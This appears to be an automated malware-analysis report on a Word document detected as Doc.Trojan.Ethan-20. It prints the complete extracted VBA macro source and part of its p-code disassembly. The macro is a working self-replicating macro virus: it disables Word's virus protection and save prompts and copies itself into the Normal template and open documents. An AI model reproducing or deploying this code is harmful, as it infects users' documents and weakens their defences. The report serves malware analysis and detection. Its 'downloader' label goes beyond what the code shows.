MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Ethan-20. It contains VBA macros that, upon execution, attempt to write macro code to 'Normal.dat' and 'License.dat' within the NormalTemplate path. This behavior suggests the macro is designed to persist or facilitate the execution of further malicious code, likely as a downloader.
Heuristics 2
-
ClamAV: Doc.Trojan.Ethan-20 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Ethan-20
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8149 bytes |
SHA-256: f718e6aad69573767a2a1691cafcaff79db46dad2a370aaff107cd281150c281 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Version = 0.24
' Ďî÷ĺěó ňű íĺ ńęŕçŕë Áĺ-Áĺ ???
On Error Resume Next
s = ActiveDocument.Saved
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
Randomize
Open NormalTemplate.Path & "\Normal.dat" For Output As #1
Open NormalTemplate.Path & "\License.dat" For Output As #2
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
Print #1, a
If i = 2 Then Print #2, a
Next i
Close #1
Close #2
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
If Left(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1), 7) <> "Version" Then
Set t = NormalTemplate.VBProject.VBComponents.Item(1)
End If
ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
Set t = ActiveDocument.VBProject.VBComponents.Item(1)
Else
t = ""
End If
If t <> "" Then
Open NormalTemplate.Path & "\Normal.dat" For Input As #1
If LOF(1) = 0 Then GoTo q
i = 1
Do While Not EOF(1)
Line Input #1, a
t.CodeModule.InsertLines i, a
i = i + 1
Loop
q: Close #1
If Left(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
If Rnd < 0.3 Then
a = MsgBox("You are lamer? Press OK to confirm", vbOKOnly, "Windows NT")
End If
End If
Kill NormalTemplate.Path & "\Normal.dat"
If Rnd < 0.05 Then
ActiveDocument.Content.InsertFile NormalTemplate.Path & "\License.dat"
ActiveDocument.Save
End If
If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
Kill NormalTemplate.Path & "\License.dat"
End Sub
Private Sub Document_New()
a = MsgBox("Č çŕ÷ĺě ňĺáĺ ýňîň ďóńňîé ôŕéë ???", vbQuestion, "WindowsNT")
End Sub
' Processing file: /opt/analyzer/scan_staging/f6cdce099e65404a888503a231d78320.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4049 bytes
' Line #0:
' FuncDefn (Private Sub Document_Close())
' Line #1:
' LitR8 0x1EB8 0xEB85 0xB851 0x3FCE
' St Version
' Line #2:
' QuoteRem 0x0000 0x001E " Ďî÷ĺěó ňű íĺ ńęŕçŕë Áĺ-Áĺ ???"
' Line #3:
' OnError (Resume Next)
' Line #4:
' Ld ActiveDocument
' MemLd Saved
' St s
' Line #5:
' LitDI2 0x0001
' UMi
' Not
' Ld Application
' MemSt EnableCancelKey
' Line #6:
' StartWithExpr
' Ld Options
' With
' BoS 0x0000
' LitDI2 0x0000
' MemStWith ConfirmConversions
' BoS 0x0000
' LitDI2 0x0000
' MemStWith VirusProtection
' BoS 0x0000
' LitDI2 0x0000
' MemStWith SaveNormalPrompt
' BoS 0x0000
' EndWith
' Line #7:
' ArgsCall Read 0x0000
' Line #8:
' Ld NormalTemplate
' MemLd Path
' LitStr 0x000B "\Normal.dat"
' Concat
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Output)
' Line #9:
' Ld NormalTemplate
' MemLd Path
' LitStr 0x000C "\License.dat"
' Concat
' LitDI2 0x0002
' Sharp
' LitDefault
' Open (For Output)
' Line #10:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0001
' Ld MacroContainer
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' For
' Line #11:
' Ld i
' LitDI2 0x0001
' LitDI2 0x0001
' Ld MacroContainer
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.